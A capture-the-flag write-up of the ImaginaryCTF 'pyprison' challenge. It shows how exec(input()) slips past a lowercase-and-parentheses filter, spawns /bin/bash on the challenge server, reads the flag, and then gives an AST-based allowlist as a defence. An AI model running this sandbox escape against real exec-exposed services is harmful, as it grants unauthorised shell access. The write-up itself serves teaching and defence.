pyprison [IMAGINARY CTF] [MISC]



Given file

#!/usr/bin/env python3

while True:
  a = input(">>> ")
  assert all(n in "()abcdefghijklmnopqrstuvwxyz" for n in a)
  print("Execing")
  exec(a)
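  • The assert is the only restriction on what we send.
  • Each input line may contain only lowercase letters and parentheses.
  • Any code we can write with just these characters is still executed, including nested calls to builtins.
  • exec(input()) passes the check and reads a second line, which goes to exec without ever passing through the assert.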
  misc python3 pyprison.py
>>> exec(input())
Execing
print('Meaw Meaw')
Meaw Meaw
  • The second line, print('Meaw Meaw'), was executed even though it contains characters outside the allowed set.
  • Now let’s try to get a shell

On the remote server:

  misc nc pyprison.chal.imaginaryctf.org 1337
== proof-of-work: disabled ==
>>> exec(input())
import os; os.system('/bin/bash')
whoami
user
id
uid=1000(user) gid=1000(user) groups=1000(user)

Now read the flag:

cat flag.txt
ictf{pyprison_more_like_python_as_a_service_12b19a09}

flag: ictf{pyprison_more_like_python_as_a_service_12b19a09}
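
A defender's view of the filter above, as an added example that is not part of the original writeup: the challenge's character allowlist accepts exec(input()), while a check on the parsed syntax tree rejects it. The names SAFE_CALLS, char_filter_ok, ast_filter_ok and safe_eval, and the choice of permitted functions, are assumptions made for illustration.

```python
import ast
import builtins

ALPHABET = set("()abcdefghijklmnopqrstuvwxyz")  # the challenge's character allowlist
SAFE_CALLS = {"abs", "len", "str", "list", "sorted"}  # assumed policy, for illustration


def char_filter_ok(line: str) -> bool:
    """The challenge's check: every character must be in the allowlist."""
    return all(ch in ALPHABET for ch in line)


def ast_filter_ok(line: str) -> bool:
    """Stricter check: a single expression made only of calls to SAFE_CALLS."""
    try:
        tree = ast.parse(line, mode="eval")
    except SyntaxError:
        return False
    for node in ast.walk(tree):
        if isinstance(node, (ast.Expression, ast.Load)):
            continue
        if isinstance(node, ast.Call):
            # The callee must be a bare allowlisted name; no keywords or *args.
            if not (isinstance(node.func, ast.Name) and node.func.id in SAFE_CALLS):
                return False
            if node.keywords or any(isinstance(a, ast.Starred) for a in node.args):
                return False
            continue
        if isinstance(node, ast.Name) and node.id in SAFE_CALLS:
            continue
        return False  # constants, attributes, subscripts, lambdas, ... are all refused
    return True


def safe_eval(line: str):
    """Evaluate an accepted expression with only the allowlisted builtins visible."""
    if not ast_filter_ok(line):
        raise ValueError("rejected by AST allowlist")
    env = {"__builtins__": {name: getattr(builtins, name) for name in SAFE_CALLS}}
    return eval(compile(ast.parse(line, mode="eval"), "<input>", "eval"), env)


if __name__ == "__main__":
    for sample in ("exec(input())", "len(str(list()))"):  # constructed inputs
        print(sample, char_filter_ok(sample), ast_filter_ok(sample))
```

In-process filtering of exec/eval input is easy to get wrong, so untrusted code should also run in a separate, unprivileged, sandboxed process.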

